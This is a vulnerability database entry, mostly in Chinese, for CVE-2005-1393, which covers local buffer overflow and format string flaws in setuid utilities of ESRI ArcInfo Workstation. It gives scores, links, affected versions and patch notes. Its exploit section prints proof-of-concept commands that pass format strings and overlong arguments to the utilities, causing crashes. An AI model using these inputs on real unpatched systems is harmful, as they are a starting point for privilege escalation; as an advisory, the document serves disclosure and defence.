CVE-2005-1393
CVSS4.6
发布时间 :2005-05-03 00:00:00
修订时间 :2016-10-17 23:19:45
NMCOS    

[原文]Multiple buffer overflows in ArcGIS for ESRI ArcInfo Workstation 9.0 allow local users to execute arbitrary code via long command line arguments to (1) asmaster, (2) asuser, (3) asutility, (4) se, or (5) asrecovery.


[CNNVD]ESRI ArcInfo Workstation多个本地缓冲区溢出及格式化字符串漏洞(CNNVD-200505-850)

        ESRI ArcInfo Workstation 9.0的ArcGIS存在多个缓冲区溢出漏洞,本地用户可以通过传给(1)asmaster,(2)asuser,(3)asutility,(4)se或(5)asrecovery的长命令行参数来执行任意代码。

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1393
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1393
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-850
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=full-disclosure&m=111489411524630&w=2
(UNKNOWN)  FULLDISC  20050430 DMA[2005-0425a] - 'ESRI ArcGIS 9.x multiple local vulnerabilities
http://securitytracker.com/id?1013852
(UNKNOWN)  SECTRACK  1013852
http://support.esri.com/index.cfm?fa=downloads.patchesServicePacks.viewPatch&PID=14&MetaID=1015
(UNKNOWN)  CONFIRM  http://support.esri.com/index.cfm?fa=downloads.patchesServicePacks.viewPatch&PID=14&MetaID=1015
http://www.digitalmunition.com/DMA%5B2005-0425a%5D.txt
(PATCH)  MISC  http://www.digitalmunition.com/DMA%5B2005-0425a%5D.txt

- 漏洞信息

ESRI ArcInfo Workstation多个本地缓冲区溢出及格式化字符串漏洞
中危 缓冲区溢出
2005-05-03 00:00:00 2005-10-20 00:00:00
本地  
        ESRI ArcInfo Workstation 9.0的ArcGIS存在多个缓冲区溢出漏洞,本地用户可以通过传给(1)asmaster,(2)asuser,(3)asutility,(4)se或(5)asrecovery的长命令行参数来执行任意代码。

- 公告与补丁

        暂无数据

- 漏洞信息

16059
ArcInfo Workstation asmaster Local Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Unknown

- 漏洞描述

A local overflow exists in ESRI ArcInfo Workstation. Asmaster fails to handle overly long command line arguments issued resulting in a buffer overflow. With a specially crafted request, an attacker can execute arbitrary files with root access resulting in a loss of integrity.

- 时间线

2005-04-30 2005-01-08
Unknow Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, ESRI has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

ESRI ArcInfo Workstation Multiple Local Buffer Overflow And Format String Vulnerabilities
Unknown 13453
No Yes
2005-04-30 12:00:00 2009-07-12 02:06:00
Discovery is credited to Kevin Finisterre.

- 受影响的程序版本

ESRI ArcInfo Workstation on UNIX 9.0
ESRI ArcInfo Workstation on UNIX 8.3

- 漏洞讨论

ESRI ArcInfo Workstation is prone to multiple local buffer overflow and format string vulnerabilities. These vulnerabilities exist in various setuid/setgid utilities installed by ArcInfo Workstation.

The vulnerabilities may be exploited to execute arbitrary code with elevated privileges.

It is believed that the vulnerabilities affect all ArcInfo Workstation installations on UNIX platforms.

- 漏洞利用

The following proof-of-concept examples were provided:

-bash-2.05b$ export
ARCHOME=AAAABBBB%x.%x.%x.%x

-bash-2.05b$ ./wservice
Can not find or access
AAAABBBB7ffffc00.2a078.9e39c.241 - wservice not run!

-bash-2.05b# export ARCHOME=%x.%x.%x.%x
-bash-2.05b# ./lockmgr
Can not find or access 7ffffc00.2a15c.9e39c.36 - lockmgr not run!

-bash-2.05b# ./asmaster `perl -e 'print "A" x 2285'` b
FATAL ERROR
Segment Violation

-bash-2.05b# ./asuser `perl -e 'print "A" x 694'` a a a
FATAL ERROR
Segment Violation

-bash-2.05b# ./asutility DBDEF REMOVE `perl -e 'print "A" x 701'`
FATAL ERROR
Segment Violation

-bash-2.05b# ./asutility RMDB `perl -e 'print "A" x 1865'`
FATAL ERROR
Segment Violation

-bash-2.05b# ./asutility CHECKDBIDS AVAILABLE `perl -e 'print "A" x
804'`
FATAL ERROR
Segment Violation

-bash-2.05b# ../bin/se `perl -e 'print "A" x 1278'`
FATAL ERROR
Segment Violation

-bash-2.05b# ./asrecovery `perl -e 'print "A" x 1987'` a a a
FATAL ERROR
Segment Violation

Exploit code was also released for the 'wservice' format string vulnrability.

- 解决方案

The vendor has released patches for ArcInfo Workstation 9.0 on UNIX. Please see the "ArcInfo Workstation 9.0 Security Patch on UNIX" advisory for further details.

ESRI has released a patch for ArcInfo Workstation 8.3 on UNIX.


ESRI ArcInfo Workstation on UNIX 8.3

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站